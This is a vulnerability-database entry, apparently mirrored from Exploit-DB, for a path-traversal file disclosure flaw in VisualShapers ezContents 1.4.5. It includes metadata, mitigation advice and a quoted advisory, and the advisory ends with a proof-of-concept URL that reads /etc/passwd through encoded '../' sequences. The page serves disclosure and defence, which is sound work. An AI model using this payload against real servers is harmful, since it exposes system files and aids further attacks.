header-logo
Suggest Exploit
vendor:
ezContents
by:
5
CVSS
MEDIUM
Arbitrary File Disclosure
22
CWE
Product Name: ezContents
Affected Version From: 1.4.2005
Affected Version To: 1.4.2005
Patch Exists: YES
Related CWE:
CPE: a:visualshapers:ezcontents:1.4.5
Metasploit:
Other Scripts:
Platforms Tested:

Arbitrary File Disclosure in VisualShapers ezContents

The vulnerability allows remote attackers to display the contents of arbitrary local files in the context of the webserver process. By exploiting this issue, an attacker can retrieve potentially sensitive information that may aid in further attacks.

Mitigation:

Upgrade to a non-vulnerable version of ezContents (1.4.6 or later). Restrict access to the affected URL or implement access controls to prevent unauthorized access. Regularly monitor and review logs for any suspicious activity.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/26737/info

VisualShapers ezContents is prone to a vulnerability that allows remote attackers to display the contents of arbitrary local files in the context of the webserver process.

An attacker can exploit this issue to retrieve potentially sensitive information that may aid in further attacks.

This issue affects ezContents 1.4.5; other versions may also be vulnerable. 

http://www.example.com/ezcontents1_4x/index.php?link=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd

Navigation

Suggest Exploit

Services By CQR